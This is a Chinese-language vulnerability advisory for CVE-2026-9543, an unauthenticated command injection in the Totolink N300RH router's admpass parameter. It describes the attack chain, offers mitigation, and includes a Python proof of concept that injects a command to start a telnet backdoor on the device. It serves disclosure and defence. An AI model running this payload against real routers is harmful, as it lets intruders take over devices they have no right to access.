IPBUF安全漏洞报告
English
CVE-2026-9543 CVSS 9.8 严重

CVE-2026-9543: Totolink N300RH OS命令注入漏洞

披露日期: 2026-05-26

漏洞信息

漏洞编号
CVE-2026-9543
漏洞类型
OS命令注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Totolink N300RH

相关标签

OS命令注入RCEIoTTotolink路由器CVE-2026-9543

漏洞概述

Totolink N300RH路由器在特定版本中存在严重的OS命令注入漏洞。该漏洞源于Web管理接口/cgi-bin/cstecgi.cgi的setPasswordCfg函数未正确过滤用户输入。攻击者可利用参数admpass注入恶意操作系统命令。由于无需认证且无需用户交互,该漏洞允许远程攻击者在目标设备上执行任意代码,导致系统完全被控。

技术细节

该漏洞产生于Totolink N300RH路由器固件版本6.1c.1353_B20190305的Web管理接口中。具体而言,位于/cgi-bin/cstecgi.cgi的CGI脚本在处理setPasswordCfg功能请求时,存在输入验证缺失。脚本直接将用户通过POST请求提交的admpass参数拼接到后台系统命令中执行,未对特殊字符进行过滤或转义。攻击者可以利用这一缺陷,构造包含Shell命令注入载荷的HTTP数据包。由于该接口未设置认证门槛(PR:N),且无需用户交互(UI:N),远程攻击者可直接向目标设备发送恶意请求。一旦利用成功,攻击者将获得设备底层系统的最高权限,能够执行任意操作系统命令,从而完全控制路由器,造成数据泄露、系统被篡改或服务中断等严重后果。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别运行固件版本6.1c.1353_B20190305的Totolink N300RH路由器。
STEP 2
2. 构造攻击载荷
攻击者构造针对/cgi-bin/cstecgi.cgi接口的恶意POST请求,在admpass参数中注入Shell命令(如;||或&&拼接符)。
STEP 3
3. 发送恶意请求
攻击者向目标路由器发送特制的数据包。由于无需身份验证,请求被后端CGI脚本直接接收处理。
STEP 4
4. 执行命令
后端脚本未过滤admpass参数,直接将其传入系统调用函数,导致恶意操作系统命令在设备上以Root权限执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi" # Vulnerable payload: injecting a command to reboot or create a backdoor # The 'admpass' parameter is vulnerable to OS Command Injection payload = ";telnetd -p 2323 &" # Example: Start telnetd on port 2323 data = { "function": "setPasswordCfg", "admpass": payload } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-9543-Scanner/1.0)" } try: response = requests.post(url, json=data, headers=headers, timeout=5) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") if response.status_code == 200: print("[+] Payload sent successfully. Check if the command was executed.") else: print("[-] Request failed.") except Exception as e: print(f"[!] Error: {e}")

影响范围

Totolink N300RH 6.1c.1353_B20190305

防御指南

临时缓解措施
如果无法立即升级固件,建议将路由器放置在防火墙之后,阻断互联网对Web管理端口(通常为80/443)的访问。同时,监控网络流量中针对/cgi-bin/cstecgi.cgi的异常POST请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表